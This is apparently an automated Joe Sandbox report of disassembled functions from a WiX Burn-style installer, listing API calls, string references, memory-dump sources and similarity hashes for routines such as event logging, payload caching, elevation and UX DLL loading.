Part of subcall function 009D0523: LeaveCriticalSection.KERNEL32(009FB5FC,?,?,009FB5F4,?,009A4207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,009954FA,?), ref: 009D067A

OpenEventLogW.ADVAPI32(00000000,Application), ref: 009A4212
GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 009A421E
ReportEventW.ADVAPI32(00000000,00000001,00000001,00000001,00000000,00000001,00000000,009E39D4,00000000), ref: 009A426B
CloseEventLog.ADVAPI32(00000000), ref: 009A4272

Strings

Failed to open Application event log, xrefs: 009A424C
Setup, xrefs: 009A41FC
_Failed, xrefs: 009A41F7
logging.cpp, xrefs: 009A4242
Application, xrefs: 009A420C
txt, xrefs: 009A41F2

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: Event$CriticalSection$CloseEnterErrorLastLeaveOpenReport
String ID: Application$Failed to open Application event log$Setup$_Failed$logging.cpp$txt
API String ID: 1844635321-1389066741
Opcode ID: d036ff90c9fbeb96579d8eb438506ba724630bd90263f13b255c1e66b0547bbf
Instruction ID: d600962e7dc6af7b920922419bf531fcef5a95e4c7b9f73f142d9372b6ec7dcb
Opcode Fuzzy Hash: d036ff90c9fbeb96579d8eb438506ba724630bd90263f13b255c1e66b0547bbf
Instruction Fuzzy Hash: BAF0DC32AC22B1BA563222A39C0EF7F192CDAC3F39702811ABD21E6181DB848D4190F5

Function 009A93FE Relevance: 16.7, APIs: 2, Strings: 9, Instructions: 226COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(000007D0,000007D0,00000000,00000000,?,00000000,00000000,00000003,00000000,00000000), ref: 009A949E
GetLastError.KERNEL32(000007D0,000007D0,00000000,00000000,000007D0,00000001), ref: 009A94C6

Strings

Failed to allocate memory, xrefs: 009A946F
Failed to get file hash., xrefs: 009A94F0
$, xrefs: 009A959D
Failed to allocate string., xrefs: 009A9534
0, xrefs: 009A955E
cache.cpp, xrefs: 009A94E6, 009A95FA, 009A964B
Failed to encode file hash., xrefs: 009A9551
Could not verify file %ls., xrefs: 009A9607
Could not close verify handle., xrefs: 009A9655

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLast
String ID: $$0$Could not close verify handle.$Could not verify file %ls.$Failed to allocate memory$Failed to allocate string.$Failed to encode file hash.$Failed to get file hash.$cache.cpp
API String ID: 1452528299-4263581490
Opcode ID: 72b35c49e39d724262cac967d0220daaab7c392fa78d14f26c4859b88b7f6451
Instruction ID: 02214aa0ea6802549774a940e0fc00feb7208b8391e109e763c12ee5ccc5076e
Opcode Fuzzy Hash: 72b35c49e39d724262cac967d0220daaab7c392fa78d14f26c4859b88b7f6451
Instruction Fuzzy Hash: 41717172D01229ABDB11DFD9C841BEEB7B8BF49760F114126F915BB291E7349D008BE1

Function 009AE56C Relevance: 16.6, APIs: 11, Instructions: 86windowCOMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 009AE577
DefWindowProcW.USER32(?,00000082,?,?), ref: 009AE5B5
SetWindowLongW.USER32(?,000000EB,00000000), ref: 009AE5C2
SetWindowLongW.USER32(?,000000EB,?), ref: 009AE5D1
DefWindowProcW.USER32(?,?,?,?), ref: 009AE5DF
CreateCompatibleDC.GDI32(?), ref: 009AE5EB
SelectObject.GDI32(00000000,00000000), ref: 009AE5FC
StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 009AE61E
SelectObject.GDI32(00000000,00000000), ref: 009AE626
DeleteDC.GDI32(00000000), ref: 009AE629
PostQuitMessage.USER32(00000000), ref: 009AE637

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: Window$Long$ObjectProcSelect$CompatibleCreateDeleteMessagePostQuitStretch
String ID:
API String ID: 409979828-0
Opcode ID: 9259e86b6d6d12965cf4788e05d4083dafa853cf21665891519f32869928b9ae
Instruction ID: 72f5c3931ad80ff3b16254e2c542feb75aac280c51f2259e8821922f06658e15
Opcode Fuzzy Hash: 9259e86b6d6d12965cf4788e05d4083dafa853cf21665891519f32869928b9ae
Instruction Fuzzy Hash: 0C21BA32159208FFCB156F68EC1CD7B7FA8EF4A760B024919F616871B4D7318850EBA0

Function 009AA13A Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 222COMMON

Download Yara Rule

Strings

Failed to combine last source with source., xrefs: 009AA210
Failed to get current process directory., xrefs: 009AA1F3
WixBundleLayoutDirectory, xrefs: 009AA26C
Failed to combine layout source with source., xrefs: 009AA2A4
WixBundleLastUsedSource, xrefs: 009AA1A1
WixBundleOriginalSource, xrefs: 009AA1B7
Failed to copy source path., xrefs: 009AA31A
Failed to get bundle layout directory property., xrefs: 009AA287

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: Find$CloseFileFirstlstrlen
String ID: Failed to combine last source with source.$Failed to combine layout source with source.$Failed to copy source path.$Failed to get bundle layout directory property.$Failed to get current process directory.$WixBundleLastUsedSource$WixBundleLayoutDirectory$WixBundleOriginalSource
API String ID: 2767606509-3003062821
Opcode ID: 346446d24440cb3de96c15231ff8b60361337937b87d2a9b0801f8b2657a751d
Instruction ID: c82b040c3f8b76e20ccc31b2af2346c1d075c94b5a8cf70e94f6766a87d0bd64
Opcode Fuzzy Hash: 346446d24440cb3de96c15231ff8b60361337937b87d2a9b0801f8b2657a751d
Instruction Fuzzy Hash: 99718A71D05229AFCF12DFA8C841AFEB7B9EF49310F55012AE910B7250EB359D40CBA2

Function 0099CBC5 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 144COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000000,FFFEB88D,000000FF,00000001,000000FF,?,00000001,009953BD,00000000,00995489,00995445,WixBundleUILevel,840F01E8,?,00000001), ref: 0099CC1C

Strings

Failed to ensure directory exists, xrefs: 0099CCEE
Failed to get next stream., xrefs: 0099CD03
Failed to find embedded payload: %ls, xrefs: 0099CC48
Failed to concat file paths., xrefs: 0099CCFC
Failed to extract file., xrefs: 0099CCE7
Failed to get directory portion of local file path, xrefs: 0099CCF5
Payload was not found in container: %ls, xrefs: 0099CD29
payload.cpp, xrefs: 0099CD1D

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: CompareString
String ID: Failed to concat file paths.$Failed to ensure directory exists$Failed to extract file.$Failed to find embedded payload: %ls$Failed to get directory portion of local file path$Failed to get next stream.$Payload was not found in container: %ls$payload.cpp
API String ID: 1825529933-1711239286
Opcode ID: da4d62b37b264fb23bc4482a7a751fb967b0a66e2ed75c9f988b4769219792d2
Instruction ID: a75ae2222586e5558e12ab7bbbe829ef7f893952caf22dbee66fdfac703fcd58
Opcode Fuzzy Hash: da4d62b37b264fb23bc4482a7a751fb967b0a66e2ed75c9f988b4769219792d2
Instruction Fuzzy Hash: 5041F6B1941219EBCF25DF4CCC41A6DBF69BF80710F11856AE955AB391E3309D40DBA0

Function 00994796 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 128windowthreadCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(00000000,00000000,00000400,00000400,00000000), ref: 009947BB
GetCurrentThreadId.KERNEL32 ref: 009947C1
GetMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0099484F

Strings

engine.cpp, xrefs: 0099489B
wininet.dll, xrefs: 009947EE
Unexpected return value from message pump., xrefs: 009948A5
Failed to start bootstrapper application., xrefs: 0099481D
Failed to create engine for UX., xrefs: 009947DB
Failed to load UX., xrefs: 00994804

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: Message$CurrentPeekThread
String ID: Failed to create engine for UX.$Failed to load UX.$Failed to start bootstrapper application.$Unexpected return value from message pump.$engine.cpp$wininet.dll
API String ID: 673430819-2573580774
Opcode ID: 507ff5201f38ea60691a264b7ea22287d8f2185fd91ce437d3454d09387746c2
Instruction ID: 655351695deab513b4519a15fe25e4c69bf191fa883e2af55ceb4ac06beca5ff
Opcode Fuzzy Hash: 507ff5201f38ea60691a264b7ea22287d8f2185fd91ce437d3454d09387746c2
Instruction Fuzzy Hash: 6541D071A41159FFEF129BA9CC85FBAB3ACEF45314F10452AF904E7290DB35AD0687A0

Function 009B9C84 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 128COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,?,?,009BB03E,?,00000001,00000000), ref: 009B9D0F
GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,?,?,009BB03E,?,00000001,00000000,00000000,00000000,00000001,00000000), ref: 009B9D19
CopyFileExW.KERNEL32(00000000,00000000,009B9B69,?,?,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 009B9D67
GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,?,?,009BB03E,?,00000001,00000000,00000000,00000000,00000001,00000000), ref: 009B9D96

Strings

apply.cpp, xrefs: 009B9D3D, 009B9D81, 009B9DBA
Failed attempt to copy payload from: '%ls' to: %ls., xrefs: 009B9DC8
BA aborted copy of payload from: '%ls' to: %ls., xrefs: 009B9D8F
Failed to clear readonly bit on payload destination path: %ls, xrefs: 009B9D48
copy, xrefs: 009B9CDD

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorFileLast$AttributesCopy
String ID: BA aborted copy of payload from: '%ls' to: %ls.$Failed attempt to copy payload from: '%ls' to: %ls.$Failed to clear readonly bit on payload destination path: %ls$apply.cpp$copy
API String ID: 1969131206-836986073
Opcode ID: 62679fc9980c627b3f3f20ad004fc4dae2456a67c9f6d21ff84e1eb3e9b79813
Instruction ID: 6568c565b7a01eb6f1fbd0358c351d18aba5aa8a2d985fb6519d44bb55c8963d
Opcode Fuzzy Hash: 62679fc9980c627b3f3f20ad004fc4dae2456a67c9f6d21ff84e1eb3e9b79813
Instruction Fuzzy Hash: 7231F532B51225B7DB209A97CD45EAB7BACAFC1B60B158119BE09AB281D620CD0086E0

Function 009A8EBC Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 126COMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(00000000,?,00000001,80000005,?,00000000,00000000,00000000,00000003,000007D0), ref: 009A9007

Strings

Failed to allocate access for Users group to path: %ls, xrefs: 009A8F72
Failed to secure cache path: %ls, xrefs: 009A8FEA
Failed to allocate access for Administrators group to path: %ls, xrefs: 009A8F0F
Failed to allocate access for SYSTEM group to path: %ls, xrefs: 009A8F30
Failed to allocate access for Everyone group to path: %ls, xrefs: 009A8F51
Failed to create ACL to secure cache path: %ls, xrefs: 009A8FBB
cache.cpp, xrefs: 009A8FB0

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: FreeLocal
String ID: Failed to allocate access for Administrators group to path: %ls$Failed to allocate access for Everyone group to path: %ls$Failed to allocate access for SYSTEM group to path: %ls$Failed to allocate access for Users group to path: %ls$Failed to create ACL to secure cache path: %ls$Failed to secure cache path: %ls$cache.cpp
API String ID: 2826327444-4113288589
Opcode ID: 2514c507e00a1f4e4ada76665d141553a61dd794ab3c7836e6a466ed31b89c8a
Instruction ID: 026251a8128552e800a5b8688ae9f8fd9482cb1f845df13825b6566dbba0bb36
Opcode Fuzzy Hash: 2514c507e00a1f4e4ada76665d141553a61dd794ab3c7836e6a466ed31b89c8a
Instruction Fuzzy Hash: 22412C32E8432ABBDB315654CC01FABB76CEB86B14F114065FA04B7180DF719E449BE1

Function 009A492F Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 117fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(00000000,crypt32.dll,00000008,?,00000000,?,00000000,00000000,crypt32.dll,00000000,?,?,?,00000000,?,00000000), ref: 009A495A
GetLastError.KERNEL32 ref: 009A4967
ReadFile.KERNEL32(?,00000000,?,?,00000000,?,00000000), ref: 009A4A12
GetLastError.KERNEL32 ref: 009A4A1C

Strings

pipe.cpp, xrefs: 009A49C6, 009A49DD, 009A4A40
crypt32.dll, xrefs: 009A4956
Failed to read message from pipe., xrefs: 009A49E7
Failed to allocate data for message., xrefs: 009A49D0
Failed to read data for message., xrefs: 009A4A4A

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorFileLastRead
String ID: Failed to allocate data for message.$Failed to read data for message.$Failed to read message from pipe.$crypt32.dll$pipe.cpp
API String ID: 1948546556-773887359
Opcode ID: c60f9ce65ac753f52202175e5b130771344893089cc55e6d559935f22247441c
Instruction ID: 7eefba52439a535ac19b1e2c9350da6116d92660393c71f3ec79dc1c0ab63ae0
Opcode Fuzzy Hash: c60f9ce65ac753f52202175e5b130771344893089cc55e6d559935f22247441c
Instruction Fuzzy Hash: C9312732D84229BBDF109FA6CC06B6FF768FB85B20F118129FD40A6240D7B09D508BD0

Function 009D6C29 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 114COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,name,000000FF,00000000,00000000,00000000,?,7556DFD0), ref: 009D6C88
CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,email,000000FF), ref: 009D6CA5
SysFreeString.OLEAUT32(00000000), ref: 009D6CE3
SysFreeString.OLEAUT32(00000000), ref: 009D6D27

Strings

uri, xrefs: 009D6CB3
name, xrefs: 009D6C7A
email, xrefs: 009D6C97
`5w, xrefs: 009D6CE3, 009D6D27

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: String$CompareFree
String ID: `5w$email$name$uri
API String ID: 3589242889-2706133310
Opcode ID: b91a7abe4882747049dbc367f90bd1897a1f22173782a3e6f81e0105b0ab4a49
Instruction ID: 85816d61645b250d2c6fee4c1ad95b640d842b10184f57c53d25a4447d1cacd2
Opcode Fuzzy Hash: b91a7abe4882747049dbc367f90bd1897a1f22173782a3e6f81e0105b0ab4a49
Instruction Fuzzy Hash: 8A41AF31A55219FBCB119BA4CD44FADB779EF44721F2182A6EA60AB2E0C7319E00DB50

Function 009AE2AF Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 104windowCOMMON

Download Yara Rule

APIs

LoadBitmapW.USER32(?,00000001), ref: 009AE2E5
GetLastError.KERNEL32 ref: 009AE2F1
GetObjectW.GDI32(00000000,00000018,?), ref: 009AE338
GetCursorPos.USER32(?), ref: 009AE359
MonitorFromPoint.USER32(?,?,00000002), ref: 009AE36B
GetMonitorInfoW.USER32(00000000,?), ref: 009AE381

Strings

(, xrefs: 009AE378
Failed to load splash screen bitmap., xrefs: 009AE31F
splashscreen.cpp, xrefs: 009AE315

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: Monitor$BitmapCursorErrorFromInfoLastLoadObjectPoint
String ID: ($Failed to load splash screen bitmap.$splashscreen.cpp
API String ID: 2342928100-598475503
Opcode ID: af757ae74d46af9ef1fbfa52032880afba07951d965e0cbd545b6b3679381c3f
Instruction ID: 1471a7c5989d41a19031514b3e29dfa48ccd20a7fe5406b55138595b4ddd5c9e
Opcode Fuzzy Hash: af757ae74d46af9ef1fbfa52032880afba07951d965e0cbd545b6b3679381c3f
Instruction Fuzzy Hash: 35315E75A41219AFDF10DFA9D949B9EBBF4EF08710F158159F904EB285EB70E900CBA0

Function 009A50CA Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 84COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,00000000,?,?,009DB500), ref: 009A50D3
GetProcessId.KERNEL32(000000FF,?,?,open,00000000,00000000,?,000000FF,?,?), ref: 009A5171
CloseHandle.KERNEL32(00000000), ref: 009A518A

Strings

runas, xrefs: 009A5131
burn.elevated, xrefs: 009A50F3
Failed to allocate parameters for elevated process., xrefs: 009A510C
Failed to launch elevated child process: %ls, xrefs: 009A515E
-q -%ls %ls %ls %u, xrefs: 009A50F8
open, xrefs: 009A513B, 009A5149

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: Process$CloseCurrentHandle
String ID: -q -%ls %ls %ls %u$Failed to allocate parameters for elevated process.$Failed to launch elevated child process: %ls$burn.elevated$open$runas
API String ID: 2815245435-1352204306
Opcode ID: 6a97559f3d4e89254aa5711560bf3ca1d92c0bb2bcbcc3990742b68adb1fc7df
Instruction ID: bd7b76e76fbdb98c6ab12453d017271eac80193c4426e109ad88832527de2377
Opcode Fuzzy Hash: 6a97559f3d4e89254aa5711560bf3ca1d92c0bb2bcbcc3990742b68adb1fc7df
Instruction Fuzzy Hash: CB2197B1E4560CFFCF12AF95CC81AAEBBB8FF45354B01816AF910A2250E7309E509B90

Function 00996882 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 75libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(msi,DllGetVersion), ref: 009968AC
GetProcAddress.KERNEL32(00000000), ref: 009968B3
GetLastError.KERNEL32 ref: 009968BD

Strings

msi, xrefs: 009968A3
Failed to find DllGetVersion entry point in msi.dll., xrefs: 009968EB
Failed to set variant value., xrefs: 00996929
Failed to get msi.dll version info., xrefs: 00996905
variable.cpp, xrefs: 009968E1
DllGetVersion, xrefs: 0099689E

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: AddressErrorHandleLastModuleProc
String ID: DllGetVersion$Failed to find DllGetVersion entry point in msi.dll.$Failed to get msi.dll version info.$Failed to set variant value.$msi$variable.cpp
API String ID: 4275029093-842451892
Opcode ID: aebaf3dc5cc13ec0dd2c98335d6ba1c5de79e66e9f9aab65dcc70763b6e47b0f
Instruction ID: f9568cc48fd0d43c2797e1dffcf1dba1d7e202391bbf7534fc915262d84e44db
Opcode Fuzzy Hash: aebaf3dc5cc13ec0dd2c98335d6ba1c5de79e66e9f9aab65dcc70763b6e47b0f
Instruction Fuzzy Hash: 7011EC72E81639B7DB206BBDDC42ABF77589B44710F01451AFE01F7241D674DC0092E1

Function 0099D6C9 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 65libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000008,00000000,?,009947FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,0099548E,?), ref: 0099D6DA
GetLastError.KERNEL32(?,009947FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,0099548E,?,?), ref: 0099D6E7
GetProcAddress.KERNEL32(00000000,BootstrapperApplicationCreate), ref: 0099D71F
GetLastError.KERNEL32(?,009947FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,0099548E,?,?), ref: 0099D72B

Strings

BootstrapperApplicationCreate, xrefs: 0099D719
Failed to load UX DLL., xrefs: 0099D712
Failed to create UX., xrefs: 0099D76F
userexperience.cpp, xrefs: 0099D708, 0099D74C
Failed to get BootstrapperApplicationCreate entry-point, xrefs: 0099D756

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLast$AddressLibraryLoadProc
String ID: BootstrapperApplicationCreate$Failed to create UX.$Failed to get BootstrapperApplicationCreate entry-point$Failed to load UX DLL.$userexperience.cpp
API String ID: 1866314245-2276003667
Opcode ID: e330e78db636f995b95c7e67cb1777bf9e36f6d7120004abf161126795552866
Instruction ID: d87c67323c91c6d9bfab65abcb70f4474e71c0b0d6a4622679b9461e7dd86cb4
Opcode Fuzzy Hash: e330e78db636f995b95c7e67cb1777bf9e36f6d7120004abf161126795552866
Instruction Fuzzy Hash: 0A11C877AC2732A7CF215BDD9C56B1B7798AB44B61F028526FE51FB280D720DC0046D0

Function 00991175 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 53libraryloadermemoryCOMMON

Download Yara Rule

APIs

HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,0099111A,cabinet.dll,00000009,?,?,00000000), ref: 00991186
GetModuleHandleW.KERNEL32(kernel32,?,?,?,?,?,0099111A,cabinet.dll,00000009,?,?,00000000), ref: 00991191
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 0099119F
GetLastError.KERNEL32(?,?,?,?,?,0099111A,cabinet.dll,00000009,?,?,00000000), ref: 009911BA
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 009911C2
GetLastError.KERNEL32(?,?,?,?,?,0099111A,cabinet.dll,00000009,?,?,00000000), ref: 009911D7

Strings

SetDllDirectoryW, xrefs: 009911BC
kernel32, xrefs: 0099118C
SetDefaultDllDirectories, xrefs: 00991199

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: AddressErrorLastProc$HandleHeapInformationModule
String ID: SetDefaultDllDirectories$SetDllDirectoryW$kernel32
API String ID: 3104334766-1824683568
Opcode ID: c6a511d6d078fc22ab7c0eb68864fced9cbda11b433071645113506e07e15d36
Instruction ID: f754b4c09ea2111d671f61d2159b6a9cd05635ef30f9ff5131f8c08ff47fdc48
